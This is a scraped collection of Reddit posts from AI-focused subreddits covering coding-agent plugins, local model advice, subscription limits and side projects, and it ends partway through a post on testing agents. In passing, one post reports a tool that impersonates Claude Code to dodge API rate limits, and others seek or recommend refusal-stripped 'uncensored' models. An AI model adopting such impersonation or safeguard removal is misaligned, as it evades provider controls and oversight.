Before: Every new Claude Code session I'd re-explain my project architecture, the tech stack decisions I made last month, which endpoints were deprecated. Basically dumping context every morning.

After: I ask "what architecture decisions did I make for the auth service?" and it pulls the exact context from 3 weeks ago with the outdated stuff already filtered out.

So now, it's pretty easy to build a knowledge base from your claude conversations that you feed back to the agent.

Setup is pretty simple.

Step 1: Install the CLI

  1. npm install -g @redplanethq/corebrain
  2. corebrain login

Step 2: Add the plugin in Claude

/plugin marketplace add redplanethq/core
/plugin install core_brain

Step 3: Add the MCP server

Restart Claude Code, then run /mcp, select core_brain from the list, and authenticate via browser.

Full guide

It's fully open source - you can self-host it locally and run it with any model you want. If you don't want to deal with infra, the cloud version has a free tier with 3,000 credits to test it out.

GitHub: github.com/RedPlanetHQ/core

https://i.redd.it/ldaf2rutwktg1.gif

r/LocalLLaMA AnatisVenator

New here, help needed with a starter Mac

Hey everyone—new here 👋

I’m trying to figure out the best truly uncensored model I can realistically run on my setup and could use some guidance.

I’m on a 2025 MacBook Air (M5, 16GB RAM, 256GB storage)—not exactly a powerhouse, I know 😅. This is actually my first Mac, and before this I hadn’t owned a computer since like 2005… so I’m learning everything from scratch. I didn’t even know what Terminal was a couple months ago.

So far I’ve managed to get Qwen3.5-9B (quantized, I think Q5/Q6) running locally, and it works okay, but I’m wondering:

  • Are there better models I should be trying in that same performance range?
  • What’s realistically the upper limit for my machine? I’ve heard ~15B max—does that sound right?
  • Any tips for squeezing the most performance out of a base M-series Air?

Basically just trying to get the most bang for my buck while I learn. Appreciate any suggestions, model recs, or general advice 🙏

r/ClaudeAI cayisik

What are the differences between 3rd Party Anthropic APIs and Official Anthropic Plans?

The answer to this question has been confusing me for a while. Especially between 3rd party API providers that let us use Claude models through different base URLs and Claude's Max plans, there are massive price differences. Despite selling so cheaply, they offer generous limits. Honestly, I've tried a few different 3rd party providers — some were good, some were bad.

But finally, I genuinely became curious about what the actual differences are. Why can they offer it so cheaply? What exactly is the difference from the original Claude plans? How exactly do these systems work, and what are the downsides compared to Claude Max plans?

I'd appreciate answers from anyone who knows how this works technically or theoretically. I'm genuinely curious.

r/ClaudeCode Inchmine

If I cancel my Pro subscription will I lose my api credits?

I still have about $45 of the free credits Claude gave me, and I'm wondering: if I cancel my Pro subscription, will I lose them?

r/LocalLLaMA Repulsive-Study-7251

I read 2.5M lines of AI agent source code and documented every architecture pattern, security gap, and dirty hack I found

I spent weeks reading through 10 major AI agent codebases line by line — not the docs, not the README, the actual source code. Then I wrote detailed teardowns of each one.

Some highlights:

- Claude Code ships 18 virtual pet species in production. A full tamagotchi system inside a coding agent.

- Pi Mono has a "stealth mode" that impersonates Claude Code to dodge API rate limits

- MiroFish (50K stars) markets "collective intelligence" — it's actually LLMs role-playing humans on a simulated social network

- Lightpanda uses a bitcast dispatch trick in Zig that makes it act like a language with vtables

- DeerFlow has an orphan tool call bug that affects every LangGraph-based agent

Projects covered: Claude Code, Dify (136K⭐), DeerFlow (58K⭐), MiroFish, Goose, Guardrails AI, Oh My Claude Code, Pi Mono, Hermes Agent, Lightpanda Browser.

Each teardown includes architecture diagrams, security analysis, design patterns, and code-level findings.

Repo: https://github.com/NeuZhou/awesome-ai-anatomy

All MIT licensed. Looking for contributors — especially if you want to help teardown Cursor, Codex CLI, or LangChain (vote on the issues).

r/ChatGPT Available-Time-6642

I asked ChatGPT what I could look like as a character in the SpongeBob SquarePants cartoon, and it generated me as that fish

r/n8n Prestigious-Field-50

First workflow

r/ClaudeAI Mac1526

I was spending 6+ hours a day on my phone. So I built an app with Claude Code that forces me to walk before I can scroll — lost 4 kgs and cut my screen time in half. Somehow it's the best thing I've done for my health.

I've been an iOS developer for a while, but this is the first app I built purely to solve my own problem — and I built almost all of it with Claude Code.

Earlier this year I looked at my Screen Time report and it hit me — 6 hours a day. Every day. That's over 91 days a year just staring at my phone doing nothing meaningful.

I tried Apple's built-in Screen Time limits. Lasted about three days before I started tapping "Ignore Limit" on autopilot. Tried deleting apps. Reinstalled them the same evening. Tried grayscale mode. My brain adjusted within a week.

Then one random morning I went for a walk without my phone. Came back 40 minutes later, and for the first time in months I didn't feel the urge to immediately open Instagram. That walk had already done what no app timer could.

That's when I thought — what if the phone itself required me to walk before I could use it?

So I built it using Claude Code. The idea is simple:

  • You set a daily step goal
  • You pick the apps that waste your time
  • Those apps stay blocked until you walk
  • Hit 50% of your goal → earn 10 minutes
  • Hit 75% → earn 15 minutes
  • Hit 100% → everything unlocks for the day

It uses Apple HealthKit for step tracking and the Screen Time API for blocking. No workarounds, no "ignore limit" button. You walk or your apps stay locked.

After the first week, my screen time dropped from 6+ hours to under 3 — and within a month I'd lost 4 kgs without even trying. Not because I was dieting or hitting the gym. I was just walking every morning before touching my phone. The walk was resetting my brain so well that by the time I earned my screen time, I genuinely didn't want to scroll anymore.

How Claude Code helped me build this:

I used Claude Code for about 90% of the development. Specifically:

  • Architecture & planning — It helped me design the entire app structure, from the onboarding flow to the subscription system
  • HealthKit & Screen Time API integration — These are notoriously tricky Apple frameworks with limited documentation. Claude wrote the step tracking logic, the app blocking system, and handled all the edge cases around permissions
  • RevenueCat subscription setup — It built the full paywall, trial logic, promotional offers, and lifetime IAP integration
  • UI/UX — All the SwiftUI views, animations, achievement system, and widgets were built with Claude
  • PostHog analytics — It integrated the full analytics pipeline, so I can track onboarding funnels and user behavior

Without Claude Code, this would have taken me significantly longer. What impressed me most was how it handled the Screen Time API — there's barely any documentation or Stack Overflow answers for FamilyControls, and Claude still got it working.

A few things I learned building this:

  • People don't lack willpower. They lack friction. One small barrier changes everything.
  • The milestone system makes it feel like a game rather than a punishment.
  • Most people already walk 3,000–4,000 steps daily without realizing it. Those steps could be earning them something.

Download WalkFirst on the App Store

Happy to answer anything below — about the app, the build process with Claude, or anything else.

r/ClaudeCode actuallyhim

Broken again?

Getting "Please run /login · API Error: 401 {"type":"error","error":{"type":"authentication_error"..." on Claude Code

r/ChatGPT programAngel

using chatgpt for texting in the dating world

I know there is a lot of backlash against using ChatGPT and generative AI in the dating world.
I've read plenty of it on Reddit itself, to say the least, including testimonies of people breaking up with their partner after discovering they had been consulting AI about what to say and how to say it.

I do think that as long as people don't just take whatever the AI gives them, and instead use their own ideas, words, and texts, using AI only to refine their message, behavior, etc., then it should be OK.

But I wonder what others think.
Are you still mostly against using AI for life advice?

r/ChatGPT Available-Time-6642

That's the pic ChatGPT generated of me. Lol, I don't actually look like that, but nice photo

r/ClaudeCode Alone_Pie_2531

Subscription limits are now at 50% of what we had 2 weeks ago

I'm comparing token burn rate from 2 weeks ago vs now, and it looks like we have 50% of what we had.

I'm using CodexBar to analyze burn rate.

Are you observing the same?

r/ClaudeAI n8signals

automated claude code login?

I have a tool I wrote that uses claude cli. It needs to refresh every 8 hours so at ~7 hours into the process I get the following popup telling me I need to refresh.

https://preview.redd.it/dfg04m15uktg1.png?width=737&format=png&auto=webp&s=cc4105a44f16734332bc5bb24595c693e53f0e3b

I run the wsl command and get the following

https://preview.redd.it/8s1tqidutktg1.png?width=926&format=png&auto=webp&s=c0669c45867c6c60e40d28a218353453995c5230

I copy the URL as one does, paste in the code to create the cookie, then switch back to my other screen to store the cookies, and the process starts over again.

Has anyone figured out a way to automate this? There isn't an API to write against, so of course this is the solution we have, but I know there are smarter people out there and maybe someone has a slicker process set up.

Thanks in advance.

r/mildlyinteresting tFromkansas

A plane following its shadow.

r/meme _Pattern_Observer_

I swear I'll surely start tomorrow

r/SideProject eazyigz123

ThumbGate Week 14: 3,582 npm downloads — blocking AI agents from repeating mistakes

Week of Apr 6, 2026 stats:

  • npm downloads: 3,582 this week (2,275 free + 1,307 pro)
  • 30-day total: 5,563 installs
  • GitHub: 11 stars, 2 forks
  • Top gate fired: push-without-thread-check
  • Agent adherence rate: 43.66%

What is ThumbGate? An MCP server that captures thumbs-up/down feedback on AI agent actions, promotes them to memory, generates prevention rules, and blocks known-bad tool calls before they execute.

Pre-action gates > post-mortem fixes.

The gate that fires most: catching pushes without PR thread checks. Saved more review cycles than anything else we built.

https://github.com/IgorGanapolsky/ThumbGate

r/StableDiffusion ThePatrekt

Weird behaviour of ZIB LoRAs trained on OneTrainer

https://preview.redd.it/h7tat2jiuktg1.png?width=960&format=png&auto=webp&s=ea09f82c1ff9b786596621a9717ac12ae43c5521

I've been experimenting with the Z-Image Selective Loader V2 node from the ComfyUI-Realtime-Lora pack and I've been facing a weird 'issue' with my character LoRAs. I'll try my best to simplify it, as it's kind of complicated to explain lol.

The main parts of the LoRA that contain the character attributes only get triggered when the 'other_weights' option is enabled. When it's disabled, the LoRA is not applied at all, even when all the diffusion layers are enabled in the Selective Loader node.

When I switch off the 'other_weights' option and have everything else enabled, nothing applies to the layers (as if the LoRA is off). When I have 'other_weights' enabled but set to 0, the LoRA only applies a weird distill effect (burnt-out colors).

And the strength of the LoRA effect (in this case the character attributes) is heavily affected by the 'other_weights' value. When it's at 1, the generation is affected by a ton, and weirdly enough it's also affected by the diffusion blocks/layers selected in the Selective Loader node at the same time: when I enable the middle or first layers/blocks, the LoRA has more effect on the foundation of the image. To make it even more complicated, when all the diffusion layers are off and only 'other_weights' is on with a high strength like 1.0, 'other_weights' affects the generated image a lot, as if the diffusion layers only amplify the effect or clean up the image better when they're enabled.

'other_weights' seems to contain the trigger for the LoRA. When it's disabled, the node's "info" output says the LoRA is disabled and not applied at all, as if 'other_weights' is the section that triggers the LoRA.

I don't really know if it's because the Selective Loader can't properly detect the layers (maybe because of an unmatched prefix) or because of the training process (the LoRA is trained on the wrong parts). One thing I'm sure of is that I don't face this issue with LoRAs trained in AI-Toolkit: there the LoRA gets applied even when 'other_weights' is disabled (even though those LoRAs are worse in quality).
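For what it's worth, the "unmatched prefix" theory is easy to picture. A selective loader plausibly sorts LoRA keys by whether their names match a known block prefix, and dumps everything unmatched into an "other_weights" bucket. This is a rough sketch of that sorting, not the actual node's code; the key names and function are made up:

```python
def split_lora_keys(lora_keys: list[str], block_prefixes: list[str]):
    """Sort LoRA keys into per-block buckets vs an 'other_weights' bucket."""
    matched, other = {}, []
    for key in lora_keys:
        for prefix in block_prefixes:
            if key.startswith(prefix):
                matched.setdefault(prefix, []).append(key)
                break
        else:
            other.append(key)   # no recognized prefix -> 'other_weights'
    return matched, other

keys = ["diffusion_model.blocks.0.attn.lora_A",
        "text_encoder.embed.lora_A"]
matched, other = split_lora_keys(keys, ["diffusion_model.blocks."])
print(other)  # ['text_encoder.embed.lora_A']
```

If OneTrainer writes the character-carrying weights under a prefix the node doesn't recognize, they would all land in 'other_weights', which would match the behavior described above.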

I've trained just one of my character LoRAs 13 times with different settings and configs. I started with u/malcolmrey's config, deleted and changed a lot of its sections, and even tried OneTrainer's default config. But nothing fixed it, even when I was training the LoRA on all layers.

Would be great if any of you could help out and share your insight on what might be causing this.

r/ClaudeCode quintenkamphuis

Ahhh yes. Good old over-engineering lol

r/LocalLLM Visual-Gain-2487

Possibly strange use case.

I'm fairly new to LocalLLMs but have enjoyed using them so far. One use case that I've been tinkering with that I didn't expect would be as fun is using it as sort of a DND DM or 'choose your own adventure' book. Writing a prompt, creating a world, and then playing it out.

My issue is that I quickly run out of context space. (Predictable limitation).

What are some ways to maximize my use case?

Is there a model that might be best for this?

What do I do when I run out of context?

5070 TI and 32 GB RAM

r/ChatGPT PT_ANDRE_PT

Improving OpenAI Codex with Repo-Specific Context

We're the team behind Codeset. A few weeks ago we published results showing that giving Claude Code structured context from your repo's git history improved task resolution by 7–10pp. We just ran the same eval on OpenAI Codex (GPT-5.4).

The numbers:

  • codeset-gym-python (150 tasks, same subset as the Claude eval): 60.7% → 66% (+5.3pp)

  • SWE-Bench Pro (400 randomly sampled tasks): 56.5% → 58.5% (+2pp)

Consistent improvement across both benchmarks, and consistent with what we saw on Claude. The SWE-Bench delta is smaller than on codeset-gym. The codeset-gym benchmark is ours, so the full task list and verifiers are public if you want to verify the methodology.

What Codeset does: it runs a pipeline over your git history and generates files that live directly in your repo — past bugs per file with root causes, known pitfalls, co-change relationships, test checklists. The agent reads them as part of its normal context window. No RAG, no vector DB at query time, no runtime infrastructure. Just static files your agent picks up like any other file in the repo.
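One piece of such a pipeline, co-change relationships, can be sketched in a few lines: count how often pairs of files change in the same commit. In practice the file lists would come from something like `git log --name-only`; here the history is passed in directly so the logic stands alone. This is my illustration of the general technique, not Codeset's code.

```python
from collections import Counter
from itertools import combinations

def co_change_counts(commits: list[list[str]]) -> Counter:
    """Count how often each pair of files changes in the same commit."""
    pairs = Counter()
    for files in commits:
        # sorted() gives each pair a canonical order; set() dedupes renames
        for a, b in combinations(sorted(set(files)), 2):
            pairs[(a, b)] += 1
    return pairs

history = [
    ["auth.py", "models.py"],
    ["auth.py", "models.py", "tests/test_auth.py"],
    ["README.md"],
]
print(co_change_counts(history).most_common(1))
# [(('auth.py', 'models.py'), 2)]
```

The resulting counts could then be rendered into a static markdown file per repo, which is the "no runtime infrastructure" part: the agent just reads it like any other file.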

Full eval artifacts are at https://github.com/codeset-ai/codeset-release-evals.

$5 per repo, one-time. Use code CODESETLAUNCH for a free trial. Happy to answer questions about the methodology or how the pipeline works.

Read more at https://codeset.ai/blog/improving-openai-codex-with-codeset

r/ClaudeCode goddamnit_1

I wanted a coding agent that's actually mine, so I distilled Claude Code down to 13 files

I’ve used all the popular coding agents on the market: Claude Code, Codex, Gemini CLI (yes, even this one), Cursor. They're all great, but they don't feel mine. Once the Claude Code codebase leaked, I figured it was the perfect time to build a coding agent for myself from scratch. I set out to distill Claude Code down to its essential parts, and I called it nano claude code.

How it works

The core loop is simple: load skills and rules → append user message → call Anthropic with tools → execute tool calls → loop until the model stops. The whole thing is 15 files: a CLI entrypoint, an agent loop, tools, MCP client, file-backed instructions (NANO.md), skills, transcripts, API wrapper, and a readline UI.

One nice detail borrowed from Claude Code: file-changing tools return diffs via git diff --no-index, so the model gets structured change feedback instead of just "write succeeded."
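The core loop described above has a simple shape. Here's a minimal sketch with the model stubbed out; the real thing calls the Anthropic API with tool schemas, and the function and message shapes here are made up for illustration:

```python
def run_agent(user_message: str, model, tools: dict) -> list[dict]:
    """Loop: send transcript to model, execute tool calls, stop when done."""
    transcript = [{"role": "user", "content": user_message}]
    while True:
        reply = model(transcript)          # stand-in for the API call
        transcript.append(reply)
        if not reply.get("tool_calls"):
            return transcript              # model stopped -> loop ends
        for call in reply["tool_calls"]:
            result = tools[call["name"]](**call["args"])
            transcript.append({"role": "tool", "name": call["name"],
                               "content": result})

# Toy model: asks for one tool call, then answers once it sees the result.
def fake_model(transcript):
    if any(m.get("role") == "tool" for m in transcript):
        return {"role": "assistant", "content": "done"}
    return {"role": "assistant", "tool_calls": [
        {"name": "read_file", "args": {"path": "NANO.md"}}]}

transcript = run_agent("summarize NANO.md", fake_model,
                       {"read_file": lambda path: f"contents of {path}"})
print(transcript[-1]["content"])  # done
```

Everything else in an agent like this (skills, MCP, approval gates) hangs off this loop, which is what makes it possible to hold the whole codebase in your head.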

What I kept from Claude Code

The harness shape (model + tool loop), the CLAUDE.md idea (shrunk to just workspace-local NANO.md), skills as the extensibility seam, MCP as first-class capability expansion, approval gates for risky actions, and local transcripts as append-only JSONL.

What I dropped

The massive command surface, React/Ink UI, concurrent tool orchestration, the hardened permission engine, and all the productization layers — memory systems, analytics, billing, feature flags, telemetry, IDE integration, voice, desktop surfaces. All valuable product features, but they explode surface area for a solo fork.

The design principle

Keep the parts that make Claude Code feel powerful. Remove the parts that make the codebase hard to hold in your head.

repo: https://github.com/Prat011/nano-claude-code

r/LocalLLaMA Dry_Sheepherder5907

Best model for 4090 as AI Coding Agent

Good day. I'm looking for the best local model for a coding agent. I might've missed something, or some model that isn't that widely used, so I came here for help.

Currently I have following models I found useful in agentic coding via Google's turbo quant applied on llama.cpp:

  • GLM 4.7 Flash Q4_K_M -> 30B
  • 30B Nemotron 3 Q4_K_M -> 30B
  • Qwen3 Coder Next Q4_K_M -> 80B

I really was trying to get Qwen3 Coder Next to a decent t/s for input and output, as I thought it would be a killer, but to my surprise... it sometimes makes such silly mistakes that I have to do lots of babysitting in the agentic flow.

GLM 4.7 Flash and Nemotron are the ones I really can't decide between; both have decent t/s for agentic coding and I use both at a maxed-out context window.

The thing is, I feel there might be some model that I've just missed.

Any suggestions?

My Rig:
RTX 4090, 64GB 5600 MT/S ram

Thank you in advance

r/SideProject Arpitech

Got bored so made this Domino Effect, lmk how it is

r/ClaudeAI BothAd2391

I built a skill building app with Claude, currently in MVP. Second idea already in ideation.

Started 2 months back on an idea: an app people can use as an alternative to doomscrolling. Started with the basic habits and content catalogue it created. I immediately fell in love with the document creation, Projects, and project knowledge features. It immediately became my brainstorming partner, more like a PM. I kept asking it to redefine the requirements as a PM and as a psychologist.

Claude has been my thinking/spec partner more than a one-shot code generator.

The idea of the first app: most apps in this space try to block scrolling, but the harder problem is that people usually open social apps because they want an easy dopamine hit, distraction, or a break.

So instead of only saying “don’t scroll,” I wanted to build something that gives you a better default action in that exact moment.

Right now Unscroll has short daily sessions across things like meditation, reading, and movement, plus streaks and lightweight progress tracking.

My workflow was:

- Claude for PRD, ideation, feature specs, and UX/product tradeoffs

- Cursor for implementation

- Claude Code for reviewing the codebase before push, especially for vulnerabilities, edge cases, and performance concerns

Second one is already in the ideation phase. It's to do with the recruitment industry. Hopefully will update about this idea in the next 6-8 weeks.

Would really appreciate it if anyone is open to giving feedback on the first one.

r/StableDiffusion Izolet

Wan 2.2 based model with weird saturation hue changes on Anime Video generation

I've been using the low version of this WAN 2.2 checkpoint merge > https://civitai.com/models/1981116/dasiwa-wan-22-i2v-14b-or-lightspeed-or-safetensors

To generate this video, but it immediately starts to shift colors to this desaturated greenish hue after a few frames. This seems to happen when the video is either too long or too big. I want to know what is causing it so I can do something about it.

Currently running a new 5070 Ti with 32 GB DDR4 RAM on ComfyUI, and I'm using their recommended CLIP/VAE. I have similar problems with other low versions of this model, like 8, 9, and 10. I've tried their recommended sampler settings, and tried individually modifying the sampler values to check if it makes any difference, with no success.

I've done some research, and some people report similar problems and blame the native VAE, or VAE tiling, but I can't tell whether their issue is the same as mine, as not all of them post a video of the error. I've tested other models like Anisora 3.2 without issues, but if possible I'd like to rescue this model, as I like the creativity in movement it creates.

Does anyone have any insight into what could be causing this issue?
Or has suggestions for Anime related video models with goon capacity?

r/whatisit Informal_Plankton822

What could be making this sound?

It’s either coming from the crawl space or inside the wall.

r/SideProject sms021

My AI Was Forgetting Everything! I Think I Fixed It :)

Something I see constantly is people trying to solve the "my AI forgets everything" problem by making their instruction file bigger: a 500-line, 1,000-line, 2,000-line .md file.

After a lot of trial and error, I've settled on a tiered approach to giving AI coding tools persistent memory. Curious what others are doing.

The problem I kept hitting: one big instruction file works until it doesn't. Past ~300 lines, the AI starts ignoring instructions in the middle. Past ~1,000 lines, you're burning context window for diminishing returns.

My current setup splits knowledge into 4 tiers:

- Global rules (~200 lines, always loaded) — preferences, routing table pointing to everything else

- Behavioral corrections (~50 lines, always loaded) — things the AI keeps getting wrong, logged as I encounter them

- Per-project context (loaded on entry) — business rules, schemas, decision logs. One file per project.

- Reference database (queried on demand) — full schemas, API docs, terminology in SQLite with full-text search

Plus a session log so the AI can recall past conversations per project.

The routing table is the key — Tier 1 doesn't hold the knowledge, it tells the AI where to find it. Small files always loaded, big knowledge only when needed.
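The Tier-4 piece (reference docs in SQLite with full-text search, queried on demand instead of always loaded) can be sketched with the standard library's FTS5 support. Table and column names here are illustrative, not SuperContext's actual schema:

```python
import sqlite3

# In-memory DB standing in for the on-disk reference database.
db = sqlite3.connect(":memory:")
db.execute("CREATE VIRTUAL TABLE docs USING fts5(topic, body)")
db.executemany("INSERT INTO docs VALUES (?, ?)", [
    ("orders schema", "orders(id, user_id, total_cents, created_at)"),
    ("billing api", "POST /v1/invoices creates an invoice draft"),
])

def lookup(query: str) -> list[str]:
    """Full-text search, best matches first; the AI calls this on demand."""
    rows = db.execute(
        "SELECT body FROM docs WHERE docs MATCH ? ORDER BY rank", (query,))
    return [r[0] for r in rows]

print(lookup("invoices"))  # ['POST /v1/invoices creates an invoice draft']
```

The always-loaded tiers stay tiny because detail like this only enters the context window when a query actually needs it.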

There's a github repo https://github.com/sms021/SuperContext if you're interested in seeing if it will work for you.

What are you all doing for persistent context? Anyone else moved beyond the single-file approach?

r/ClaudeAI yoouvee

Is it possible to make Claude use Google Sheets to create a financial model? Would this eat a lot of tokens? And how accurate and detailed would it be (with formulas integrated and a dashboard)?

Claude X Google Sheets, possibilities and limitations?

r/LocalLLaMA CrimsonShikabane

We aren’t even close to AGI

Supposedly we’ve reached AGI according to Jensen Huang and Marc Andreessen.

What a load of shit. I tried to get Claude code with Opus 4.6 max plan to play Elden Ring. Couldn’t even get past the first room. It made it past the character creator, but couldn’t leave the original chapel.

If it can’t play a game that millions have beaten, if it can’t even get past the first room, how are we even close to Artificial GENERAL Intelligence?

I understand that this isn’t in its training data but that’s the entire point. Artificial general intelligence is supposed to be able to reason and think outside of its training data.

r/SideProject StatusIndividual4007

Finally finished my first app. Anyone want to help me test it?

Hey guys,

I just finished the MVP for my first mobile app. I originally went with a "read later" app because it felt simple and like a perfect fit for AI. I poured a ton of effort into figuring out how to help people actually distill knowledge in a way that feels intuitive, rather than just bookmarking links they'll never open again.

But tbh, after months of development, I’ve been feeling pretty discouraged. I realized the "read later" space is getting tougher—tools like NotebookLM are dominating, and website paywalls/restrictions are making everything a lot harder to build. I definitely lost some of my motivation along the way.

That said, I’m determined to see this through. I really want to experience the full process of launching something from start to finish, even if the market is shifting.

The app basically does two things:

  1. A Knowledge Web: It builds a visual map that grows as you take notes.
  2. Integrated AI: It’s built right into the reading flow to help you summarize and connect ideas.

I'm looking for 20 people who wouldn’t mind spending a bit of their time to test it out before I hit publish. If you're interested, just drop a comment below and I'll DM you for the details! I’d really appreciate any honest feedback or advice you guys have!

https://reddit.com/link/1se1bty/video/gafcowmb4ltg1/player

r/SideProject Responsible_Let_7806

Expense Diary: Expense Tracker

Hello guys! I just want to share something I’ve been working on recently.

I built this app because I got tired of overcomplicated expense trackers.

Too many features. Too much clutter.

When all I really needed was something simple that works.

So I created my own.

Expense Diary: Expense Tracker is now live on iOS and Android

It’s not trying to be everything.

Just the essentials:

• Clean and simple expense tracking

• Quick daily logging widget

• Lightweight and fast

That’s it.

No distractions. No unnecessary features.

If you’re someone who just wants to track expenses without the hassle, you might like this.

I’m just starting out, so I’d really appreciate your support.

Try it, share it, or even just drop your feedback.

Every small support helps

App Store
Play Store

r/mildlyinteresting plain-extraordinaire

Peach juice.. made with 100% pear juice.

r/meme LVA_MoP

We are just chill like that

r/mildlyinteresting blindralfie

Nopal farted here

r/LocalLLaMA AnOnlineHandle

After a week of trying many models for fiction writing, Gemma 4 26B A4B IT (Heretic) is the first one which feels actually capable.

In the very early days I was able to finetune a gen 1 llama base model on my own writing, but I wanted to avoid setting that all up again and was hoping that I could instruct a more modern model into writing what I want.

However every model which could fit on my GPU which I tried was a disappointment, even though they were widely praised as the best. Short contexts, frequent incoherency, not grasping the prompt, not grasping the subtleties of example text snippets, etc.

I was about to give up, but decided whatever I'll try an 'unlocked' version of the new Gemma models even though I expected that it would be bad due to the original training dataset being overly focused on math and 'safe' corporate content. And holy hell, I finally found a model which just works, and works incredibly well. There's a chance it might have included some of my own writing in some capacity which is out there across the web going back a few decades, since it locks right onto my style, themes, settings, etc. However when I query it for any specifics it doesn't seem to know them, so I don't think that's the case.

I suspect that I'll be renting some cloud processing for the first time ever to finetune this soon and make it even better. But even out of the box it's extremely capable. If anybody is looking for a strong local writing model, Gemma 4 is amazing. I used the following recommended creative writing settings, where I could find equivalents in LM Studio.

https://huggingface.co/nohurry/gemma-4-26B-A4B-it-heretic-GUFF

r/SideProject BallinwithPaint

[Easter Special] I’m building 4 MVPs (Web or Mobile)🐣

Hey everyone,

I’m Ray, a senior software engineer and the founder of TechInvolved. I usually spend my time architecting agentic AI systems and high-scale SaaS engines, but for Easter, I wanted to do something a little different.

I’m opening up 4 spots to build a functional, production-ready MVP for $250.

Why am I doing this?

I recently launched my agency, and while I have plenty of enterprise experience, I want to build a few more "startup-speed" case studies for our portfolio. Instead of building random side projects myself, I figured I’d help 4 of you get your ideas off the ground.

What you get for $250:

  • Full-Stack Build: A real web app or mobile app. No "no-code" limitations here.
  • Authentication & Database: Secure login and data storage.
  • AI Integration (if needed): I specialize in agentic AI, so if your idea needs LLM features, I’ve got you.
  • Clean Code: You own the repo. It’s built to scale, not just to show off.

The Catch?

There isn't one, other than the fact that I only have time for 4 projects at this rate. I’m looking for clear, concise ideas that can be built into a solid V1 in a week.

To apply: Shoot me a DM with:

  1. A 2-3 sentence summary of your idea.
  2. Your target audience.
  3. Your "must-have" feature.

Let’s build something cool. 🚀

*P.S. You can check out some of my work at techinvolved.dev

r/ChatGPT OkRisk3092

Has anyone tried Meow for agent bank accounts?

Saw someone mention this on twitter and it sounds almost too good to be true. Apparently you can open a business bank account and manage it entirely through AI agents like ChatGPT. The whole thing from onboarding to bill pay to invoicing is supposed to work through a conversational interface without ever touching a website.

Im running a medium sized ecommerce business and I spend way too much time on the financial side of things every week and if I could hand that off to an agent that would be really good for me.

r/LocalLLaMA Ice-Flaky

Gemma4 (e4b) hallucinating when reading .py files

I simply asked it read the directory (on a new conversation, no history) and describe what it is to me.

Once it reached a few python files, it started to getready to create files e modify stuff, as the .py files were meant to do.

So far, I have a few yml instructions for it, running the architect and installed the Universal Tags.

How do you keep Gemma4 from doing anything except the core prompt?

r/ollama No-Title-184

What if the real breakthrough for local LLMs isn’t cheaper hardware, but smarter small models?

I’ve been thinking that the real question for local LLMs may no longer be: “When will GPUs and RAM get cheaper?”

For a while, the race felt mostly centered around brute force: more parameters, bigger models, more scale, more hardware. But lately it seems like the direction is slowly shifting. Instead of just pushing toward massive trillion-parameter systems, more of the progress now seems to come from efficiency: better architectures, better training, lower-bit inference, smarter quantization, and getting more actual quality out of smaller models.

That’s why I’m starting to think the more important question is not when hardware becomes dramatically cheaper, or when the next Mac Studio / GPU generation arrives with even more memory, but when the models themselves become good enough that the sweet spot is already something like an M4 with 24 GB RAM.

In other words: when do we hit the point where “good enough local intelligence on modest hardware” becomes the real standard?

If that happens, then the future of local AI may be less about chasing the biggest possible machine and more about using the right efficient model for the right task. And maybe also less about one giant generalist model, and more about smaller, smarter, more specialized local models for specific use cases.

That’s also why models and directions like Gemma 4, Gemma Function, or Microsoft’s ultra-efficient low-bit / 1-bit style experiments seem so interesting to me. They feel closer to the actual long-term local AI sweet spot than the old mindset of just scaling forever.

Am I overreading this, or have you also noticed that the race seems to be shifting from “more parameters at all costs” toward “more quality per parameter”?

r/homeassistant FFHPunk

Has anyone figured out getting "Landbook" into HA? (Omnibreeze DC2313R)

I really like the Omnibreeze tower fan from Costco. I've pretty much bought one a year as I find more spots that could use a fan. Just made a Costco run and picked a new one up, and to my surprise it uses a new app called LandBook, not SmartLife like the others I've had in years past. I saw a post about modding the older versions for offline use, but can't find any info for LandBook. It integrates with Google Home pretty well, so I'm not sure why I can't get it into HA. I'm not super technical and just started using HA about 3 months ago, so if I missed something obvious please let me know. Thanks!

r/AI_Agents chicken_5000s

Cost-effective AI (Lumin)

Just finished Lumin

It’s a local AI cost-saving proxy for agent setups. It compresses, caches, and routes requests.
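The caching part of such a proxy can be sketched in a few lines. This is a generic illustration of the idea, not Lumin's actual implementation: identical requests are keyed by a hash of model + prompt, so repeated-context loops hit the cache instead of the upstream API.

```python
import hashlib
import json

class CachingProxy:
    """Minimal sketch of a cost-saving cache in front of an LLM API."""

    def __init__(self, upstream):
        self.upstream = upstream  # callable: (model, prompt) -> response
        self.cache = {}
        self.hits = 0
        self.misses = 0

    def _key(self, model: str, prompt: str) -> str:
        # Canonical JSON so the same request always maps to the same key.
        payload = json.dumps({"model": model, "prompt": prompt}, sort_keys=True)
        return hashlib.sha256(payload.encode()).hexdigest()

    def complete(self, model: str, prompt: str):
        key = self._key(model, prompt)
        if key in self.cache:
            self.hits += 1
            return self.cache[key]
        self.misses += 1
        response = self.upstream(model, prompt)
        self.cache[key] = response
        return response

# Toy upstream that records how often it is actually called.
calls = []
proxy = CachingProxy(lambda m, p: calls.append(p) or f"echo:{p}")
proxy.complete("gpt", "hello")
proxy.complete("gpt", "hello")   # served from cache, no upstream call
proxy.complete("gpt", "world")
```

A real proxy would add eviction, TTLs, and semantic (not just exact-match) keys, but the hit/miss accounting above is where the reported savings percentages come from.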

Average savings on my free benchmark so far: ~11%

Best case so far on repeated-context loops: 57%

Also verified an OpenClaw -> Lumin -> OpenAI path locally.

Looking for feedback, and GitHub stars if you find it useful.

r/AI_Agents Problemsolver_11

How does testing change for agentic AI systems vs traditional SDLC?

Hey everyone,

I’m trying to understand how testing evolves when moving from traditional software systems to agentic AI systems.

In standard SDLC, testing is deterministic (unit, integration, regression). But with agents:

  • Outputs are non-deterministic
  • Behavior depends on context, tools, and memory
  • Multi-step pipelines make debugging tricky

So curious:

  • How do you define correctness?
  • Do unit/integration tests still work, or are eval frameworks replacing them?
  • How do you handle regression testing when outputs can vary?
  • Is runtime monitoring/guardrails becoming more important than pre-release testing?
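One pattern people use in place of exact-match assertions is a scored eval: run the agent N times, grade each output against a rubric (keyword checks, schema validation, an LLM judge), and assert a pass-rate threshold rather than a single deterministic result. A toy sketch of the idea; the grader here is a stand-in for whatever rubric you'd actually use:

```python
import itertools
import json

def grade(output: str) -> bool:
    """Stand-in rubric: output must be valid JSON containing a 'summary' key."""
    try:
        return "summary" in json.loads(output)
    except (ValueError, TypeError):
        return False

def eval_agent(agent, prompt: str, runs: int = 10, threshold: float = 0.8) -> bool:
    """Pass if at least `threshold` of the runs satisfy the rubric."""
    passes = sum(grade(agent(prompt)) for _ in range(runs))
    return passes / runs >= threshold

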